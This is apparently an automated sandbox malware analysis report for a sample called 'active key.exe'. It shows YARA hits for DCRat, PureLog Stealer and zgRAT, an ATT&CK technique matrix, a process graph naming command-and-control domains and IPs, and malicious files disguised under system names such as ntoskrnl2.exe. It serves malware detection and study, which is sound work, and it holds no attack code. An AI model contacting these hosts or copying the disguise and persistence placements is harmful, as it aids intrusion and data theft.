                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeQueries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe VolumeInformation
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeQueries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe VolumeInformation
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exeQueries volume information: C:\Windows\System32\ntoskrnl2.exe VolumeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exeQueries volume information: C:\Windows\System32\ntoskrnl2.exe VolumeInformation
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeQueries volume information: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe VolumeInformation
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeQueries volume information: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe VolumeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ntoskrnl2.exe PID: 5012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XUkPLaESKIkbWXdxlvmVntDv.exe PID: 7672, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 5.2.ntoskrnl2.exe.1b180000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.ntoskrnl2.exe.1b180000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 5.2.ntoskrnl2.exe.1b180000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.ntoskrnl2.exe.1b180000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ntoskrnl2.exe PID: 5012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XUkPLaESKIkbWXdxlvmVntDv.exe PID: 7672, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 5.2.ntoskrnl2.exe.1b180000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.ntoskrnl2.exe.1b180000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 5.2.ntoskrnl2.exe.1b180000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.ntoskrnl2.exe.1b180000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts11
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    Abuse Elevation Control Mechanism                    		11
                    Disable or Modify Tools                    		1
                    Credential API Hooking                    		2
                    File and Directory Discovery                    		Remote Services12
                    Archive Collected Data                    		12
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory114
                    System Information Discovery                    		Remote Desktop Protocol1
                    Credential API Hooking                    		2
                    Non-Application Layer Protocol                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    Abuse Elevation Control Mechanism                    		Security Account Manager21
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive13
                    Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Scheduled Task/Job                    		1
                    Obfuscated Files or Information                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                    Software Packing                    		LSA Secrets31
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items233
                    Masquerading                    		DCSync1
                    Remote System Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502880 Sample: active key.exe Startdate: 02/09/2024 Architecture: WINDOWS Score: 100 81 128538cm.n9shteam3.top 2->81 83 keyauth.win 2->83 91 Multi AV Scanner detection for domain / URL 2->91 93 Suricata IDS alerts for network traffic 2->93 95 Antivirus detection for URL or domain 2->95 97 18 other signatures 2->97 9 active key.exe 3 2->9         started        14 ntoskrnl2.exe 2->14         started        16 XUkPLaESKIkbWXdxlvmVntDv.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 85 keyauth.win 104.26.0.5, 443, 49727 CLOUDFLARENETUS United States 9->85 87 127.0.0.1 unknown unknown 9->87 73 C:\Windows\System32\ntoskrnl2.exe, MS-DOS 9->73 dropped 111 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->111 113 Drops executables to the windows directory (C:\Windows) and starts them 9->113 115 Found direct / indirect Syscall (likely to bypass EDR) 9->115 20 ntoskrnl2.exe 4 20 9->20         started        24 cmd.exe 1 9->24         started        26 cmd.exe 1 9->26         started        28 conhost.exe 9->28         started        89 128538cm.n9shteam3.top 80.211.144.156, 49732, 49733, 49734 ARUBA-ASNIT Italy 14->89 75 C:\Users\user\Desktop\hCHhiobl.log, PE32 14->75 dropped 77 C:\Users\user\Desktop\ZHsakaRB.log, PE32 14->77 dropped 79 C:\Users\user\Desktop\DnHERPdP.log, PE32 14->79 dropped 117 Multi AV Scanner detection for dropped file 16->117 file6 signatures7 process8 file9 65 C:\Windows\tracing\fontdrvhost.exe, MS-DOS 20->65 dropped 67 C:\Windows\...\XUkPLaESKIkbWXdxlvmVntDv.exe, MS-DOS 20->67 dropped 69 C:\Users\user\Desktop\mlzPodne.log, PE32 20->69 dropped 71 6 other malicious files 20->71 dropped 99 Antivirus detection for dropped file 20->99 101 Multi AV Scanner detection for dropped file 20->101 103 Machine Learning detection for dropped file 20->103 109 4 other signatures 20->109 30 cmd.exe 20->30         started        33 powershell.exe 20->33         started        35 powershell.exe 23 20->35         started        45 5 other processes 20->45 105 Uses ping.exe to sleep 24->105 107 Uses ping.exe to check the status of other devices and networks 24->107 37 mode.com 1 24->37         started        39 certutil.exe 3 1 26->39         started        41 find.exe 1 26->41         started        43 find.exe 1 26->43         started        signatures10 process11 signatures12 119 Uses ping.exe to sleep 30->119 47 conhost.exe 30->47         started        61 2 other processes 30->61 121 Loading BitLocker PowerShell Module 33->121 49 conhost.exe 33->49         started        51 WmiPrvSE.exe 33->51         started        53 conhost.exe 35->53         started        55 schtasks.exe 45->55         started        57 schtasks.exe 45->57         started        59 schtasks.exe 45->59         started        63 10 other processes 45->63 process13

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    active key.exe68%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    active key.exe68%VirustotalBrowse
                    active key.exe100%AviraTR/Black.Gen2
                    active key.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\Public\Pictures\backgroundTaskHost.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\Desktop\ZHsakaRB.log100%AviraHEUR/AGEN.1300079
                    C:\Windows\System32\ntoskrnl2.exe100%AviraTR/Dropper.Gen
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe100%AviraTR/Dropper.Gen
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat100%AviraBAT/Delbat.C
                    C:\Users\user\Desktop\mlzPodne.log100%AviraHEUR/AGEN.1300079
                    C:\Windows\tracing\fontdrvhost.exe100%AviraTR/Dropper.Gen
                    C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe100%AviraTR/Dropper.Gen
                    C:\Users\Public\Pictures\backgroundTaskHost.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\ZHsakaRB.log100%Joe Sandbox ML
                    C:\Windows\System32\ntoskrnl2.exe100%Joe Sandbox ML
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe100%Joe Sandbox ML
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\hCHhiobl.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\UZXJUHSP.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\mlzPodne.log100%Joe Sandbox ML
                    C:\Windows\tracing\fontdrvhost.exe100%Joe Sandbox ML
                    C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe100%Joe Sandbox ML
                    C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe75%VirustotalBrowse
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe75%VirustotalBrowse
                    C:\Users\Public\Pictures\backgroundTaskHost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Users\Public\Pictures\backgroundTaskHost.exe75%VirustotalBrowse
                    C:\Users\user\Desktop\DnHERPdP.log29%ReversingLabs
                    C:\Users\user\Desktop\DnHERPdP.log29%VirustotalBrowse
                    C:\Users\user\Desktop\UZXJUHSP.log8%ReversingLabs
                    C:\Users\user\Desktop\UZXJUHSP.log11%VirustotalBrowse
                    C:\Users\user\Desktop\ZHsakaRB.log21%ReversingLabs
                    C:\Users\user\Desktop\ZHsakaRB.log28%VirustotalBrowse
                    C:\Users\user\Desktop\aAtQiRdB.log29%ReversingLabs
                    C:\Users\user\Desktop\aAtQiRdB.log29%VirustotalBrowse
                    C:\Users\user\Desktop\hCHhiobl.log8%ReversingLabs
                    C:\Users\user\Desktop\hCHhiobl.log11%VirustotalBrowse
                    C:\Users\user\Desktop\mlzPodne.log21%ReversingLabs
                    C:\Users\user\Desktop\mlzPodne.log28%VirustotalBrowse
                    C:\Windows\System32\ntoskrnl2.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Windows\System32\ntoskrnl2.exe75%VirustotalBrowse
                    C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe75%VirustotalBrowse
                    C:\Windows\tracing\fontdrvhost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Windows\tracing\fontdrvhost.exe75%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    keyauth.win0%VirustotalBrowse
                    128538cm.n9shteam3.top13%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://www.microsoft.0%URL Reputationsafe
                    https://curl.haxx.se/docs/http-cookies.html0%URL Reputationsafe
                    http://crl.m0%URL Reputationsafe
                    http://pki-ocsp.symauth.com00%URL Reputationsafe
                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
